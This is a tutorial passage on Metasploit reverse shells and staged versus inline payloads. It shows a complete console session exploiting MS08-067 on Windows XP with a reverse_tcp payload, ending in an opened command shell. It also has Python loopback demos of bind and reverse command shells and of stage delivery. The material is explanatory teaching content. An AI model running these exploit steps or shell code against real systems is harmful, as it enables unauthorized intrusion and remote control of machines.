A reverse shell is the opposite of a bind shell. Instead of opening a port on the target and waiting for the attacker to connect to it, the payload connects back to the attacker's IP and port and attaches a shell to that connection. The practical reason to prefer it is a target behind NAT or a firewall: inbound connections to the target are blocked, but an outbound connection from the target to the attacker is usually allowed.
The following commands launch the exploit with a reverse shell payload:
msf> use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.0.7
RHOST => 192.168.0.7
msf exploit(ms08_067_netapi) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > set LHOST 192.168.0.3
LHOST => 192.168.0.3
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.0.3:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (240 bytes) to 192.168.0.7
[*] Command shell session 1 opened (192.168.0.3:4444 -> 192.168.0.7:1027) at Sat Nov 13 22:59:02 +0000 2010
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
The attacker's IP is the tell. A reverse shell needs LHOST (here 192.168.0.3) so the payload knows where to connect back, and the handler listens there on LPORT (4444 by default, as the "Started reverse handler" line shows); a bind shell needs only RHOST, because the attacker connects to the target. LHOST must be an address the target can actually reach: if the attacker's machine is itself behind NAT, LHOST has to be the externally visible address, with the port forwarded to the listener, or the stage will never arrive.
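The two connection directions described above, as an added example that is not code from the original page or from Metasploit. Both functions run one command on a "target" thread and return its output together with the direction of the TCP connection, so the difference (who listens, who connects) can be observed offline. The loopback address 127.0.0.1 and the helper names are assumptions for illustration.

```python
"""Reverse shell versus bind shell, on loopback (added example)."""
import socket
import subprocess
import threading
from typing import Tuple


def _serve_one_command(conn: socket.socket) -> None:
    """Target side: receive one command line, run it, return its output."""
    cmd = conn.recv(4096).decode().strip()
    out = subprocess.run(cmd, shell=True, capture_output=True).stdout
    conn.sendall(out)
    conn.close()


def _drive(conn: socket.socket, command: str) -> bytes:
    """Attacker side: send a command and collect everything until EOF."""
    conn.sendall(command.encode() + b"\n")
    chunks = []
    while True:
        data = conn.recv(4096)
        if not data:
            break
        chunks.append(data)
    conn.close()
    return b"".join(chunks)


def bind_shell(command: str) -> Tuple[bytes, str]:
    """Bind shell: the TARGET listens and the attacker connects in.
    This inbound connection is exactly what NAT or a firewall in front
    of the target blocks."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))          # target opens a port (RPORT in msf terms)
    srv.listen(1)
    rport = srv.getsockname()[1]

    def target() -> None:
        conn, _ = srv.accept()
        _serve_one_command(conn)
        srv.close()

    t = threading.Thread(target=target)
    t.start()
    out = _drive(socket.create_connection(("127.0.0.1", rport)), command)
    t.join()
    return out, "attacker -> target"


def reverse_shell(command: str) -> Tuple[bytes, str]:
    """Reverse shell: the ATTACKER listens (the 'reverse handler' on
    LHOST:LPORT) and the target connects back out, which NAT and
    egress-permissive firewalls usually allow."""
    handler = socket.socket()
    handler.bind(("127.0.0.1", 0))      # LHOST:LPORT, port chosen by the OS here
    handler.listen(1)
    lport = handler.getsockname()[1]

    def target() -> None:
        _serve_one_command(socket.create_connection(("127.0.0.1", lport)))

    t = threading.Thread(target=target)
    t.start()
    conn, _ = handler.accept()          # peer address is the target's ephemeral port
    handler.close()
    out = _drive(conn, command)
    t.join()
    return out, "target -> attacker"


if __name__ == "__main__":
    print(bind_shell("echo bind"))
    print(reverse_shell("echo reverse"))
```

Only the listening side changes between the two functions; the command loop on the target is identical. That is why a firewall that permits outbound traffic but drops unsolicited inbound connections defeats the bind variant and not the reverse one.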
What is the difference between inline and staged payloads? An inline (single) payload is one self-contained piece of shellcode that the exploit delivers in full, so it runs without contacting the attacker for more code. A staged payload is split in two: the exploit carries only a small stager, whose job is to open the communication channel back to the attacker and read the rest of the shellcode, the stage, over that channel before handing control to it; that is the "Sending stage (240 bytes)" line in the output above. Metasploit names staged payloads with a slash (windows/shell/reverse_tcp) and inline ones with an underscore (windows/shell_reverse_tcp). Stagers are the common choice because the stager is much smaller than the complete payload, which matters when the exploit leaves little room for it; the trade-off is a second transfer that the handler must complete before the session is usable.
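The stage transfer described above, as an added example that is not Metasploit's code. It models the second transfer with a 4-byte little-endian length prefix followed by the stage body, which is the framing Metasploit's reverse_tcp stagers use; the stage bytes are constructed filler (0xCC), not shellcode, and the size cap is an assumption added here as the check a stager should make before trusting a length it received over the network.

```python
"""Stage delivery over an already-connected channel (added example)."""
import socket
import struct

CONSTRUCTED_STAGE = b"\xcc" * 240      # constructed stand-in for a 240-byte stage
MAX_STAGE = 16 * 1024 * 1024           # assumed sanity bound for the length field


def send_stage(sock: socket.socket, stage: bytes) -> None:
    """Handler side: announce the length, then stream the stage."""
    sock.sendall(struct.pack("<I", len(stage)) + stage)


def recv_exact(sock: socket.socket, n: int) -> bytes:
    """Read exactly n bytes; a single recv() may return fewer."""
    buf = bytearray()
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError(f"channel closed after {len(buf)} of {n} bytes")
        buf.extend(chunk)
    return bytes(buf)


def read_stage(sock: socket.socket, max_len: int = MAX_STAGE) -> bytes:
    """Stager side: read the length, refuse implausible values, then read the stage."""
    (length,) = struct.unpack("<I", recv_exact(sock, 4))
    if length == 0 or length > max_len:
        raise ValueError(f"implausible stage length {length}")
    return recv_exact(sock, length)


def stage_exchange(stage: bytes = CONSTRUCTED_STAGE) -> bytes:
    """Run both sides over a socketpair and return what the stager received.
    Sending before reading works here because the demo stage fits in the
    socket buffer; a real handler and stager run on different hosts."""
    handler, stager = socket.socketpair()
    try:
        send_stage(handler, stage)
        return read_stage(stager)
    finally:
        handler.close()
        stager.close()


def rejects_oversized_length() -> bool:
    """A peer claiming an absurd stage size is refused instead of allocated for."""
    handler, stager = socket.socketpair()
    try:
        handler.sendall(struct.pack("<I", 0xFFFFFFFF))
        read_stage(stager)
        return False
    except ValueError:
        return True
    finally:
        handler.close()
        stager.close()


if __name__ == "__main__":
    print(len(stage_exchange()), "bytes of stage received")
    print("oversized length rejected:", rejects_oversized_length())
```

The stager logic is a few dozen bytes of machine code in practice: connect, read four bytes, allocate, read the rest, jump to it. Everything of substance lives in the stage, which is why the exploit can get away with a tiny payload buffer but cannot complete the session if the handler is unreachable or the connection drops mid-transfer.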